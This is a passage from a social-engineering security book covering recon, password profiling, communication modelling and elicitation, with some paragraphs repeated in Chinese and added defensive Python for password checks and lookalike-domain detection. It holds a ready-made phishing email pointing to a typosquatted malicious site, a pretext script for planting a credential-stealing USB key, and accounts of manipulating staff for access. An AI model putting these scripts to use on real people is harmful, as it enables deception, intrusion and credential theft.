  • Grab and run: Unless you are in such a secluded area that you have no chance of being caught, grabbing some bags and going elsewhere to rummage through them might be best.

Dumpster diving almost always leads to some very useful information. Sometimes a social engineer doesn’t even have to dive into a dumpster to find the goods. The article at www.social-engineer.org/resources/book/TopSecretStolen.htm was already mentioned in Chapter 1, but it solidifies this thought. The Canadian CTU (Counter-Terrorism Unit) had plans for a new building that outlined its security cameras, fences, and other top-secret items. These blueprints were just thrown away—yes, just tossed in the trash, not even shredded, and fortunately found by a friendly person.

This story is just one of many that show “the height of stupidity,” as the article stated, but from a social engineer’s point of view, trash diving is one of the best information gathering tools out there.

Using Profiling Software

Chapter 7 discusses the tools that make up some of the professional toolsets of social engineers, but this section offers a quick overview.

Password profilers such as the Common User Passwords Profiler (CUPP) and Who’s Your Daddy (WYD) can help a social engineer profile the potential passwords a company or person may use.

How to use these tools is discussed in Chapter 7, but a tool like WYD will scrape a person’s or company’s website and create a password list from the words mentioned on that site. It is not uncommon for people to use words, names, or dates as passwords. These types of software make it easy to create lists to try.
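
The list item earlier about “special words or phrases that can help in password profiling” and the description of WYD above cover the attacker’s side. As an added example (not the book’s code and not CUPP’s or WYD’s), here is the defender’s counterpart in Python: a password policy check that harvests the same kind of words from the organisation’s own public pages and rejects passwords built from them. The HTML, company name and domain are constructed for the example.

```python
import re
from html import unescape

# Constructed sample of a company's public pages (hypothetical company and
# domain). A profiler like WYD would fetch and scrape these; here the text
# is embedded so the check runs offline.
SAMPLE_SITE_HTML = """<html><head><title>Widgetcorp - Home of the Blue Falcon</title></head>
<body><h1>Welcome to Widgetcorp</h1>
<p>Founded in 1998 in Springfield, we build the Falcon and Kestrel product lines.</p>
<p>Support forum: ask about Falcon firmware 2.1.</p>
<p>Contact: support@widgetcorp.example &middot; Our mascot is Rusty the dog.</p>
</body></html>"""

# Common letter-for-symbol substitutions; undone before matching.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t", "@": "a", "$": "s"})
# Generic words that would only cause false positives in a policy check.
STOPWORDS = {"home", "welcome", "founded", "build", "product", "lines", "support",
             "forum", "about", "contact", "firmware", "mascot", "example"}


def profile_words(html, min_len=4):
    """Words a profiler would harvest from the site: visible text and title,
    four-digit years, and the parts of any email addresses on the page."""
    text = unescape(re.sub(r"<[^>]+>", " ", html))
    words = set()
    for w in re.findall(r"[A-Za-z][A-Za-z']+|\d{4}", text):
        w = w.lower().strip("'")
        if len(w) >= min_len and w not in STOPWORDS:
            words.add(w)
    for addr in re.findall(r"[\w.+-]+@[\w-]+", text):
        local, _, domain = addr.lower().partition("@")
        parts = re.split(r"[.+-]", local) + [domain]
        words.update(p for p in parts if len(p) >= min_len and p not in STOPWORDS)
    return words


def normalize(password):
    """Undo the cosmetic changes people apply to a base word: case, a trailing
    year or punctuation ('Falcon2024!'), and leet spelling ('Falc0n')."""
    base = re.sub(r"[^a-z]+$", "", password.lower())
    return base.translate(LEET)


def check_password(password, profile, min_len=12):
    """Return None if the password passes, else a short reason for rejection."""
    if len(password) < min_len:
        return "too short"
    base = normalize(password)
    # Longest profile word first so the reason names the most specific match.
    for word in sorted(profile, key=len, reverse=True):
        if word in base:
            return f"contains profile word '{word}'"
    return None


if __name__ == "__main__":
    profile = profile_words(SAMPLE_SITE_HTML)
    for candidate in ("Blu3Falc0n2024!", "W1dgetc0rp-Spring", "Rusty1998!",
                      "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate, profile) or 'ok'}")
```
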

 

Amazing tools such as Maltego (see Chapter 7 for more details), made by Paterva, are an information gatherer’s dream. Maltego allows a social engineer to perform many web-based and passive information gathering searches without having to use any utilities but Maltego itself.

It then stores and graphs this data on the screen to be used for reporting, exporting, or other purposes. This can really help in developing a profile of a company.

Remember, your goal as you collect data is to learn about the target company and the people within the company. Once a social engineer collects enough data, a clear picture forms of the best way to put the data gathered from the targets to use. You want to profile the company as a whole and find out roughly how many employees are part of some club, hobby, or group. Do they donate to a certain charity, or do their kids go to the same school? All of this information is very helpful in developing a profile.

A clear profile helps the social engineer not only in developing a good pretext, but can also outline what questions to use, which are good or bad days to call or come onsite, and many other clues that can make the job so much easier.

All of the methods discussed so far are mostly physical, very personal methods of information gathering. I didn’t touch on the very technical side of information gathering, such as services like SMTP, DNS, NetBIOS, and the almighty SNMP. I do cover some of the more technical aspects that Maltego can help with in Chapter 7 in more detail. These methods are worth looking into but are very much technical in nature as opposed to more “human” in nature.

Whatever method you use to gather information, the logical question that comes up is: now that you know where to gather, how to gather, and even how to catalog, store, and display this information, what do you do with it?

As a social engineer, after you have the information you must start planning your attacks. To do that, you need to start modeling an outline that will use this information. One of the best ways to start utilizing this data is to develop what is called a communication model.

Communication Modeling

The more elaborate our means of communication, the less we communicate.

—Joseph Priestley

Communication is a process of transferring information from one entity to another. Communication entails interactions between at least two agents, and can be perceived as a two-way process in which there is an exchange of information and a progression of thoughts, feelings, or ideas toward a mutually accepted goal or direction.

This concept is very similar to the definition of social engineering, except that the assumption here is that those involved in the communication already have a common goal, whereas the goal of the social engineer is to use communication to create a common goal. Communication is a process whereby information is enclosed in a package and is channeled and imparted by a sender to a receiver via some medium. The receiver then decodes the message and gives the sender feedback. All forms of communication require a sender, a message, and a receiver. Understanding how communication works is essential to developing a proper communication model as a social engineer. Modeling your communication as a social engineer will help you decide the best method of delivery, the best method for feedback, and the best message to include.

Communication can take many different forms. There are auditory means, such as speech, song, and tone of voice, and there are nonverbal means, such as body language, sign language, paralanguage, touch, and eye contact.

Regardless of the type of communication used, the message and how it is delivered will have a definite effect on the receiver.

Understanding the basic ground rules is essential to building a model for a target. Some rules cannot be broken, such as that communication always has a sender and a receiver. Also, everyone has different personal realities that are built and affected by their past experiences and their perceptions.

Everyone perceives, experiences, and interprets things differently based on these personal realities. Because of this, any given event will always be perceived differently by different people. If you have siblings, a neat exercise to prove this is to ask them their interpretation or memory of an event, especially if it is an emotional one. You will see that their interpretation of the event is very different from what you remember.

Each person has both a physical and a mental personal space. You allow or disallow people to enter that space or get close to you depending on many factors. When communicating with a person in any fashion, you are trying to enter their personal space. As social engineers communicate, they are trying to bring someone else into their space and share that personal reality. Effective communication attempts to bring all participants into each other’s mental location. This happens with all interactions, but because it is so common, people do it without thinking about it.

In interpersonal communications, two layers of messages are being sent: verbal and nonverbal.

Communication usually contains a verbal or language portion, whether it is in spoken, written, or expressed word. It also usually has a nonverbal portion—facial expressions, body language, or some non-language message like emoticons or fonts.

Regardless of the amount of each type of cue (verbal or nonverbal), this communication packet is sent to the receiver and then filtered through her personal reality. She will form a concept based on her reality, and then based on that will start to interpret this packet. As the receiver deciphers this message, she begins to unscramble its meaning, even if that meaning is not what the sender intended. The sender will know whether his packet was received the way he intended if the receiver returns a communication packet indicating her acceptance or denial of the original packet.

Here the packet is the form of communication: the words, letters, or emails sent. When the receiver gets the message, she has to decipher it. How it is interpreted depends on many factors. Is she in a good mood, a bad mood, happy, sad, angry, compassionate? All of these things, as well as the other cues that alter her perception, will help her to decipher that message.

The social engineer’s goal has to be to give both the verbal and nonverbal cues the advantage to alter the target’s perception so as to have the impact the social engineer desires.

Some more basic rules for communication include the following:

  • Never take for granted that the receiver has the same reality as you.
  • Never take for granted that the receiver will interpret the message the way it was intended.
  • Communication is not an absolute, finite thing.
  • Always assume that as many different realities exist as there are different people involved in the communication.

Knowing these rules can greatly enhance the ability for good and useful communication. This is all well and good, but what does communication have to do with developing a model? Even more, what does it have to do with social engineering?

The Communication Model and Its Roots

As already established, communication basically means sending a packet of information to an intended receiver. The message may come from many sources, like sight, sound, touch, smell, and words. This packet is then processed by the target and used to paint an overall picture of “what’s being said.” This method of assessment is called the communication process. This process was originally outlined by social scientists Claude Shannon and Warren Weaver in 1947, when they developed the Shannon-Weaver model, also known as “the mother of all models.”

The Shannon-Weaver model, according to Wikipedia, “embodies the concepts of information source, message, transmitter, signal, channel, noise, receiver, information destination, probability of error, coding, decoding, information rate, [and] channel capacity,” among other things.

Shannon and Weaver defined this model with a graphic, as shown in Figure 2-8.

In a simple model, also known as the transmission model, information or content is sent in some form from a sender to a destination or receiver. This common concept of communication simply views communication as a means of sending and receiving information. The strengths of this model are its simplicity, generality, and quantifiability.

Figure 2-8: The Shannon-Weaver “mother of all models.”

Shannon and Weaver structured this model based on:

  • An information source, which produces a message
  • A transmitter, which encodes the message into signals
  • A channel, to which signals are adapted for transmission
  • A receiver, which “decodes” (reconstructs) the message from the signal
  • A destination, where the message arrives

They argued that three levels of problems for communication existed within this theory:

  • The technical problem—How accurately can the message be transmitted?
  • The semantic problem—How precisely is the meaning conveyed?
  • The effectiveness problem—How effectively does the received meaning affect behavior? (This last point is important to remember for social engineering. The whole goal of the social engineer is to create a behavior that the social engineer wants.)

大约 15 年后,戴维·贝罗 (David Berlo) 扩展了香农和韦弗的线性通信模型,并创建了发送者-消息-通道-接收者 (SMCR) 通信模型。SMCR 将模型分为明确的部分,如图2-9所示。

Almost 15 years later, David Berlo expanded on Shannon and Weaver’s linear model of communication and created the Sender-Message-Channel-Receiver (SMCR) model of communication. SMCR separated the model into clear parts, as shown in Figure 2-9.

Figure 2-9: The Berlo model.

You can think of communication as processes of information transmission governed by three levels of rules:

  • Formal properties of signs and symbols
  • The relations between signs/expressions and their users
  • The relationships between signs and symbols and what they represent

Therefore, you can further refine the definition of communication as social interaction where at least two interacting agents share a common set of signs and a common set of rules.

In 2008 another researcher, D. C. Balmund, combined the research of many of his previous cohorts with his own and developed the transactional model of communication, as shown in Figure 2-10.

In this model you can see that the channel and message can take on many forms, not just spoken, as represented by the picture. The message can be in written, video, or audio form and the receiver can be one person or many people. The feedback also can take on many forms.

Combining and analyzing this research can help a social engineer develop a solid communication model. Not only social engineers can benefit from doing this—everyone can. Learning how to develop a plan of communication can enhance the way you deal with your spouse, your kids, your employer or employees—anyone you communicate with.

Figure 2-10: The new and improved communication model.

Because the focus of this book is social engineers, you need to analyze what a social engineer can take away from all of this. After reading all this theory you may begin to wonder how this can be used. Remember, a social engineer must be a master at communication. They must be able to effectively enter into and remain in a person’s personal and mental space and not offend or turn off the target. Developing, implementing, and practicing effective communication models is the key to accomplishing this goal. The next step then is developing a communication model.

Developing a Communication Model

Now that you know about the key elements of a communication model, take a look at them from the eyes of a social engineer:

  • The Source: The social engineer is the source of the information or communication that is going to be relayed.
  • The Channel: This is the method of delivery.
  • The Message: Probably the biggest part of the message is knowing what you are going to say to the receiver(s).
  • The Receiver(s): This is the target.
  • The Feedback: What do you want them to do after you effectively give them the communication?

How can you use these elements effectively? The first step into the world of communication modeling is starting with your goal. Try working with a couple of the scenarios that might be part of a typical social engineering gig:

  • Develop a phishing email targeted against 25–50 employees and attempt to have them go during work hours to a non-business website that will be embedded with malicious code to hack into their networks.
  • Make an onsite visit to portray a potential interviewee who has just ruined his resume by spilling coffee on it and needs to convince the front-desk person to allow a USB key to be inserted into a computer to print a copy of the resume.

When developing a communication strategy you may find working on the model in reverse order to be beneficial.

  • Feedback: What is your desired response? The desired response is to have the majority of the employees you send this email to click on it. That is ideal; of course, you might be happy with just a handful or even one, but the goal, the desired feedback, is to have the majority of targets click on the phishing link.
  • Receivers: This is where your information gathering skills come in handy. You need to know all about the targets. Do they like sports? Are they predominantly male or female? Are they members of local clubs? What do they do in their off time? Do they have families? Are they older or younger? The answers to these questions can help the social engineer decide what type of message to send.
  • Message: If the target is predominantly 25–40-year-old males, with a few being part of a fantasy football or basketball league, your targets may click on a link about sports, women, or a sporting event. Developing the email’s content is essential, but grammar, spelling, and punctuation are also very important to consider. One of the biggest tip-offs to phishing emails in the past has been bad spelling.

Getting an email that reads like this: “Click here and enter ur pasword to verify ur account settings,” is a dead giveaway that it is not a legitimate email. Your email must look legitimate, with good spelling and an appealing offer that fits the target. Even with the same goal the message will change depending on gender, age, and many other factors. The same email would probably fail if the targets were predominantly female.

  • Channel: The answer to this element is easy, because you already know it is going to be an email.
  • Source: Again, this element is a no-brainer, because you, the social engineer, are the source. How believable you are depends on your skill level as a social engineer.

Scenario One: Phishing Email

The targets are 45 males ranging from the age of 25 to 45. Out of the 45 targets, 24 are in the same fantasy basketball league. They all go daily to a site (www.myfantasybasketballleague.com) to register their picks. This is verified by posts on the forums.

The goal is to drive them to a site that is available and that you now own, www.myfantasybasketballeague.com, which is a slight misspelling. This site is a clone of the site they visit with one change—it has an embedded iframe. There will be a Login button in the center of the page that when clicked, brings them back to the real site. The delay in loading and clicking will give the code the time it needs to hack their systems.

How would you write the email? Here is a sample that I wrote:

Hello,

We have some exciting news at My Fantasy Basket Ball League. We have added some additional features that will allow you more control over your picks as well as some special features. We are working hard on offering this to all of our members but some additional service fees may apply.

We are excited to say that the first 100 people to log in will get this new service for free. Click this link to be taken to the special page, click the gray LOGIN button on the page, and log in to have these features added to your account. www.myfantasybasketballeague.com

Thanks,

The MFBB Team

This email would most likely get at least the 24 who are already in the league interested enough to click the link, check out the site, and try these new features for free.

Analyze that email. First, it contains an offer that would attract the present members of that fantasy league. Many of them would realize the offer is limited to only the first 100, so they would click on it as soon as they get the email, which more than likely is at work. The site that the email drives them to has the malicious code, and although the majority will fall victim, all the malicious social engineer needs is one victim.

Also notice that the email contains good grammar and spelling, an enticing hook, and enough motivation to click quickly. It is a perfect email based on a solid communication model.
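From the defender’s side, the two things this scenario relies on, a lookalike domain and a link in the mail body, are exactly what a mail filter can check. The following Python is an added example, not code from the book; the sample mail body is constructed from the email above, and the known-good domain list and the edit-distance threshold of 2 are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the scenario's email as a mail filter would see it.
SAMPLE_EMAIL = """Hello,

We are excited to say that the first 100 people to log in will get this
new service for free. Click this link to be taken to the special page,
click the gray LOGIN button on the page, and log in to have these
features added to your account. www.myfantasybasketballeague.com

Thanks,

The MFBB Team
"""

# Assumed allow-list: domains the organisation knows its staff visit.
KNOWN_GOOD = {"myfantasybasketballleague.com"}

# Matches http(s) URLs and bare www. hosts as they appear in mail text.
URL_RE = re.compile(r'(?:https?://|www\.)[^\s<>"\']+', re.IGNORECASE)


def extract_hosts(text):
    """Return the distinct, normalised host names linked in a mail body."""
    hosts = []
    for raw in URL_RE.findall(text):
        url = raw if raw.lower().startswith("http") else "http://" + raw
        host = (urlparse(url).hostname or "").lower().rstrip(".")
        if host.startswith("www."):
            host = host[4:]
        if host and host not in hosts:
            hosts.append(host)
    return hosts


def damerau_levenshtein(a, b):
    """Optimal string alignment distance: inserts, deletes, substitutions
    and adjacent transpositions each cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # delete
                          d[i][j - 1] + 1,          # insert
                          d[i - 1][j - 1] + cost)   # substitute
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transpose
    return d[len(a)][len(b)]


def lookalike_hosts(text, known_good=KNOWN_GOOD, max_distance=2):
    """Flag linked hosts that are not on the allow-list but sit within a
    few edits of an allow-listed domain: the dropped 'l' in the scenario,
    a swapped letter pair, or an inserted hyphen all score 1."""
    findings = []
    for host in extract_hosts(text):
        if host in known_good:
            continue
        for good in sorted(known_good):
            dist = damerau_levenshtein(host, good)
            if 0 < dist <= max_distance:
                findings.append((host, good, dist))
    return findings


if __name__ == "__main__":
    for host, good, dist in lookalike_hosts(SAMPLE_EMAIL):
        print(f"suspicious link: {host} is {dist} edit(s) from {good}")
```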

 

Scenario Two: USB Key

The onsite scenario is a little more difficult to do because it is in person. You can only do so much to “spoof” your identity in person. In this scenario remember that you must have all these details in memory because you can’t be pulling out and using cue cards. It is also important to remember that oftentimes we have only one chance to make an impression. If we do a bad job at it, it can ruin the rest of the gig.

  • Feedback: The goal with this scenario is to get the front desk receptionist to accept your USB drive that has a malicious program on it. The program will auto-load and scrape her system for all information, such as usernames, passwords, email accounts, SAM files that contain all the passwords on the system, and more, copying it all to a directory on the USB drive. It also creates a reverse connection from the receptionist’s machine to your servers, giving you access to her machine and hopefully the network. I am fond of using the Metasploit framework or the Social Engineering Toolkit (see Chapter 7) that ties in with Metasploit. Metasploit executes exploit code on its victims and it has a built-in handler called Meterpreter. The user can script many things like keylogging, screenshots, and recon from the victim’s machine.
  • Receivers: Having one true target can be tricky because if your target is unreceptive to the idea, your plan is shot. You must be warm, friendly, and convincing. This must be done fast, too, because too much time will allow doubt to set in. But if you move too fast you can cause doubt and fear, killing your chances. A perfect balance must be accomplished.
  • Message: Because you’re delivering the message in person, it must be clear and concise. The basic story is that you saw the ad in the paper for a database administrator and you called in and spoke to Debbie, the HR person. She said she was booked today but you should stop in and drop off a resume for her review and then meet her at the end of the week. While you were driving over, a squirrel ran out, causing you to slam on the brakes and causing your coffee to come out of the holder and spill in your bag, ruining your resumes and other stuff. Anyhow, you have another appointment but really need this job and wonder whether she would print you a fresh copy from your USB drive.
  • Channel: You are going in person using verbal, facial, and body language communication.
  • Source: Again, this is you as the social engineer, unless you have a good reason to have a stand-in.

Holding a coffee-stained folder with some wet papers in it can help sell the story. Looking dejected and not alpha-male-ish can also help sell it. Politely speaking to her and not using foul language will help her feel a liking to you and maybe even some pity. The USB key should contain a file called myresume.doc or myresume.pdf and be printable. PDFs are the most commonly used formats since most companies are running an older version of Adobe Reader that is vulnerable to many different exploits. Make sure the resume is in a format that allows for the most people to be able to open it—not some odd format.

Most of the time people want to help. They want to be able to assist a person in distress if the story is believable as well as heart wrenching. For a special twist if you really lack a heart as a social engineer, you can put a spin on the story: On my way over, it was my turn today to drop my daughter off at school. When she climbed over the seat to give me a kiss goodbye she knocked over my coffee into my bag. I was already running late and closer to here than home; could you print me a fresh copy?

Either way, this story usually works and will lead to the USB key being inserted into the computer and most likely a complete compromise of the receptionist’s computer, which can lead to a total compromise of the company.

The Power of Communication Models

Communication modeling is a powerful tool that is a must-have skill for every social engineer. The hardest part about communication modeling is to ensure your information-gathering sessions are solid.

In both of the earlier scenarios, not having a good plan and model will lead to failure. A good way to practice communication modeling is to write out a model for manipulating people you know well—a husband, wife, parent, child, boss, or friend—to do something you want, to take some action you desire.

Set a goal, nothing malicious, such as getting someone to agree to a different vacation spot or to go to a restaurant you love and your partner hates, or to allow you to spend some money on something you normally wouldn’t ask for. Whatever it is you come up with, write out the five communication components and then see how well the communication goes when you have a written plan. You will find that with your goals clearly defined, you can better test your social engineering communication methods, and be able to achieve your goals more easily. List the following five points and fill them out one by one, connecting the dots as you go along.

  • Source
  • Message
  • Channel
  • Receivers
  • Feedback

Communication modeling yields very valuable information and without it, most communication will not be successful for a social engineer. As previously mentioned, information gathering is the crux of every social engineering gig, but if you become proficient at information gathering and you are able to gather amazing amounts of data but don’t know how to use it, it is a waste.

Learn to become a master at information gathering and then practice putting that into action with communication modeling. This is just the start, but it can literally change the way you deal with people both as a social engineer and in everyday contexts. Yet so much more goes into developing a solid message in the communication model.

One key aspect of learning how to communicate, how to manipulate, and how to be a social engineer is learning how to use questions, as discussed in the next chapter.

Chapter 3

Elicitation

The supreme art of war is to subdue the enemy without fighting.

—Sun Tzu

Being able to effectively draw people out is a skill that can make or break a social engineer. When people see you and talk to you they should feel at ease and want to open up.

Have you ever met someone and instantly felt, “Wow I like that person”? Why? What was it about him that made you feel that way? Was it his smile? The way he looked? The way he treated you? His body language?

Maybe he even seemed to be “in tune” with your thoughts and desires. The way he looked at you was non-judgmental and right away you felt at ease with him.

Now imagine you can tap into that and master that ability. Don’t shrug off this chapter as a simple “how to build rapport” lesson. This chapter is about elicitation, a powerful technique used by spies, con men, and social engineers, as well as doctors, therapists, and law enforcement, and if you want to be protected or be a great social engineer auditor then you need to master this skill. Used effectively, elicitation can produce astounding results.

What is elicitation? Very few aspects of social engineering are as powerful as elicitation. This is one of the reasons it is near the top of the framework. This skill alone can change the way people view you. From a social engineering standpoint, it can change the way you practice security. This chapter dissects examples of expert elicitation and delves deep into how to utilize this powerful skill in a social engineering context.

Before getting in too deep, you must begin with the basics.

What Is Elicitation?

Elicitation means to bring or draw out, or to arrive at a conclusion (truth, for instance) by logic. Alternatively, it is defined as a stimulation that calls up (or draws forth) a particular class of behaviors, as in “the elicitation of his testimony was not easy.”

Read that definition again and if it doesn’t give you goose bumps you may have a problem. Think about what this means. Being able to effectively use elicitation means you can fashion questions that draw people out and stimulate them to take a path of a behavior you want. As a social engineer, what does this mean? Being effective at elicitation means you can fashion your words and your questions in such a way that it will enhance your skill level to a whole new level. In terms of information gathering, expert elicitation can translate into your target wanting to answer your every request.

I want to take this discussion one step further because many governments educate and warn their employees against elicitation because it is used by spies all over the earth.

In training materials, the National Security Agency of the United States government defines elicitation as “the subtle extraction of information during an apparently normal and innocent conversation.”

These conversations can occur anywhere that the target is—a restaurant, the gym, a daycare—anywhere. Elicitation works well because it is low risk and often very hard to detect. Most of the time, the targets don’t ever know where the information leak came from. Even if a suspicion exists that there is some wrong intent, one can easily pass it off by acting like an angry stranger being accused of wrongdoing for merely asking a question.

Elicitation works so well for several reasons:

  • Most people have the desire to be polite, especially to strangers.
  • Professionals want to appear well informed and intelligent.
  • If you are praised, you will often talk more and divulge more.
  • Most people would not lie for the sake of lying.
  • Most people respond kindly to people who appear concerned about them.

These key factors about most humans are why elicitation works so well. Getting people to talk about their accomplishments is too easy.

In one scenario in which I was tasked to gather intel on a company, I met my target at a local chamber of commerce function. Because it was a mixer I hung back until I saw the target approaching the bar. We got there at the same time and because the purpose of these functions is to meet and greet people and exchange business cards, my first move wasn’t extreme.

I said, “Escaping from the vultures?”

He replied with a chuckle, “Yeah, this is what makes these things worth the time—open bar.”

I listened to him order, and I ordered a similar drink. I leaned over with my hand out and said, “Paul Williams.”

“Larry Smith.”

I pulled out a business card I had ordered online. “I work with a little import company as the head of purchasing.”

He said as he handed me his card, “I am the CFO for XYZ.”

With a chuckle I responded, “You’re the guy with the bucks—that’s why everyone is after you out there. What exactly do you guys do?”

He began to relate a few details of his company’s products, and when he listed one that is well known, I said, “Oh right, you guys make that widget; I love that thing. I read in XYZ Magazine it hit a new sales record for you guys.” From my previous information gathering I knew he had personal interest in that device so my praise was well received.

He began to puff his chest out a bit. “Did you know that device sold more in the first month than our previous and next five products combined?”

“Yikes, well I can see why, because I bought five myself.” I chuckled through the mild praise.

After another drink and some more time I was able to discover that they recently purchased accounting software, the name of the CSO (and the fact he was on vacation for a few days), and that my friend here was also going on vacation soon to the Bahamas with his wife.

This seemingly useless info is not useless at all. I have a list of details about software, people, and vacations that can help me plan an attack. But I didn’t want to stop there; I went in for the kill with a question like this:

“I know this is a weird question, but we are a small company and my boss told me I am to research and buy a security system for the doors. We just use keys now, but he was thinking RFID or something like that. Do you know what you guys use?”

This question, I thought, would send up red flares and smoke signals. Instead, he said, “I have no clue; I just signed the checks for it. What I do know is I have this fancy little card…” as he pulled out his wallet to show me his card. “I think it is RFID, but all I know is that I wave my wallet in front of the little box and the door opens.”

We exchanged laughs and I walked away with knowledge that led to some very successful attack vectors. As you may have noticed, elicitation is similar to and linked to information gathering. This particular information-gathering session was made so much easier by a solid pretext (discussed in Chapter 4) as well as good elicitation skills. Elicitation skills are what made the questions flow smoothly and what made the target feel comfortable answering my questions.

Knowing that he was on vacation, what kind of accounting software they used, and how their doors were secured, I was able to plan an onsite visit to repair a “faulty” RFID box and time clock. Simply by telling the front desk receptionist, “Larry called me before he left for the Bahamas and said there was a time clock by the manufacturing department that is not registering properly. It will take me a few minutes to test and analyze it,” I was given access in a matter of seconds without ever being questioned.

Elicitation led me to that success because with the knowledge I was given there was no reason for the receptionist to doubt my pretext.

Simple, light, airy conversation is all it takes to get some of the best information out of many people. As discussed so far, clearly defining your goals to achieve maximum results is vital. Elicitation is not used merely for information gathering, but it can also be used to solidify your pretext and gain access to information. All of this depends on a clearly defined and thought-out elicitation model.

The Goals of Elicitation

 

回顾诱导定义可以让你清楚地了解你的目标是什么。但实际上,你可以将其归结为一件事。社会工程师希望目标采取行动,无论该行动是像回答问题一样简单,还是像允许访问某个限制区域一样大。为了让目标服从,社会工程师会问一系列问题或进行对话,以激励目标走上这条道路。

Reviewing the definition for elicitation can give you a clear path of what your goals are. Really, though, you can boil it down to one thing. A social engineer wants the target to take an action, whether that action be as simple as answering a question or as big as allowing access to a certain restricted area. To get the target to comply, the social engineer will ask a series of questions or hold a conversation that will motivate the target to that path.

 

信息是关键。你收集的信息越多,攻击就越成功。由于诱导不具威胁性,因此非常成功。计算一下你一周在商店、咖啡店或其他地方与某人进行多少次毫无意义的闲聊。进行对话的整个方法都充满了诱导,并且每天都以非恶意的方式使用。这就是它如此有效的原因。

Information is the key. The more information that you gather, the more successful the attack will be. Because elicitation is non-threatening it is very successful. Count how many times in a week you have meaningless little conversations with someone at a store, coffee shop, or elsewhere. The whole methodology of holding conversations is steeped in elicitation and it is used in a non-malicious way daily. That is why it is so effective.

 

在英国热门电视节目《The Real Hustle》的一集中,主持人演示了许多社会工程攻击的简易性。在这一集中,目标是将目标引入一场被操纵的运气游戏。为此,某人让一个扮演完全陌生角色的伙伴对攻击者感兴趣并与其交谈。这种对话吸引了周围的人,这使得从目标那里引出适当的反应变得非常容易。这是一种行之有效的方法。

In one episode of the popular British television show The Real Hustle, the hosts demonstrated the ease of many social engineering attacks. In this episode the goal was to draw a target into a game of luck that was rigged. To do so someone had a partner who acted as a complete stranger play a role in being interested and conversational with the attacker. This conversation draws in the surrounding people, which made eliciting proper responses from the target very easy. This is one method that works well.

 

无论使用哪种方法,目标都是获取信息,然后利用这些信息激励目标走上社会工程师希望他走的路。理解这一事实很重要。后面的章节介绍了借口和其他操纵策略,但你不想将诱导与这些混淆。认识到诱导就是对话很重要。当然,它可能与你的借口、肢体语言和眼神暗示密切相关,但所有这些都比不上你让人们参与对话的能力。

Whichever method is used, the goal is to obtain information and then utilize that information to motivate a target to the path the social engineer wants him to take. Understanding this fact is important. Later chapters cover pretexting and other manipulation tactics, but you don’t want to confuse elicitation with those. Realizing that elicitation is conversation is important. Sure, it may be closely linked to your pretext, body language, and eye cues, but all of those pale in comparison to your ability to engage people in conversation.

Some experts agree that mastering the art of conversation has three main steps:

1. Be natural. Nothing can kill a conversation quicker than seeming to be uncomfortable or unnatural in the conversation. To see this for yourself, try this exercise. Have a conversation with someone about something you know a lot about. If you can record it somehow or have someone else take notice, see how you stand, your posture, and the way you assert your knowledge. All of these things will scream confidence and naturalness. Then inject yourself into a conversation you know nothing about and have the same recording or friend observing. See how all those nonverbal aspects change for you when you try to inject an intelligent thought into a conversation you know nothing about.

This exercise shows you the difference between being natural and not being natural. The person(s) you are conversing with will be able to see it easily, which will kill all chances of successful elicitation. How do you seem natural in conversations? Thus we arrive at step 2.

2. Educate yourself. You must have knowledge of what it is you will be talking to your targets about. This section should come with a big fat red neon light warning, but because every book can’t include one let me emphasize this part:

It is imperative that you not pretend to be more than you can reasonably be believed to be.

Confused? Here’s an example to break it down. If you wanted to obtain the chemical composition for a top-secret product, your elicitation target is one of the chemists involved in making the product, and you decide to start talking chemistry, do not pass yourself off as a world-class chemist (unless you are). He may throw something at you that will show you know nothing, and then your cover is blown and so is the elicitation.

A more realistic approach may be that you are a research student studying XYZ, and were told he had amazing knowledge in this area. Due to his expertise, you just wanted to ask him a question on a chemical formula you are working on and why it doesn’t seem to be working out.

The point is that whatever you choose to converse about and with whomever, do research, practice, and be prepared. Have enough knowledge to speak intelligently about a topic that will interest the target.

3. Don’t be greedy. Of course, the goal is to get information, get answers, and be given the key to the kingdom. Yet, do not let that be the focus. That you are only there for yourself will quickly become evident and the target will lose interest. Often, giving someone something will elicit the feeling of reciprocation (discussed in Chapter 6), where he or she now feels obligated to give you something in return. Being this way in conversation is important. Make the conversation a give and take, unless you are conversing with a person who wants to dominate the conversation. If he wants to dominate, let him. But if you get a few answers, feel the conversation out and don’t get greedy trying to go deeper and deeper, which can raise a red flag.

Sometimes the people who are labeled as the “best conversationalists” in the world are those who do more listening than talking.

These three steps to successful elicitation can literally change the way you converse with people daily, and not just as a social engineer or a security auditor, but as an everyday person. I personally like to add one or two steps to the “top three.”

For example, an important aspect to elicitation is facial expressions during a conversation. Having your gaze be too intense or too relaxed can affect the way people react to your questions. If your words are calm and you have engaged the target in a conversation but your body language or facial expressions show disinterest, it can affect the mood of the person, even if she doesn’t realize it.

This may seem odd to bring up here, but I am a fan of Cesar Millan, aka The Dog Whisperer. I think that guy is a genius. He takes dogs that seem unruly and in a matter of minutes has both the dogs and their owners produce high-quality personality traits that will merit a very successful relationship for both. He basically teaches people how to communicate with a dog—how to ask and tell it to do things in a language it understands. One of the things he preaches that I fully believe in is that the “spirit” or energy of the person affects the “spirit” or energy of the dog. In other words, if the person approaches the dog all tense and anxious, even if the words are calm, the dog will act tense, bark more, and be more on edge.

Obviously, people are not the same as dogs, but I truly believe that this philosophy applies. As a social engineer approaches a target, her “spirit” or energy will affect the person’s perception. The energy is portrayed through body language, facial expressions, dress, and grooming, and then the words spoken to back that up. Without even knowing it, people pick up on these things. Have you ever thought or heard someone say, “That guy gave me the creeps” or “She looked like such a nice person”?

How does that work? The person’s spirit or energy is relayed to your “sensors,” that data is correlated with past experiences, and then a judgment is formed. People do it instantaneously, many times without even knowing it. So your energy when you are going to elicit must match the role you are going to play. If your personality or mental makeup doesn’t enable you to easily play a manager, then don’t try. Work with what you have. Personally, I have always been a people person, and my strong suit is not topics like chemistry or advanced math. If I were in the situation mentioned earlier I would not try to play the role of a person who knows about those things. Instead my elicitation might be as simple as a stranger interested in starting a conversation about the weather.

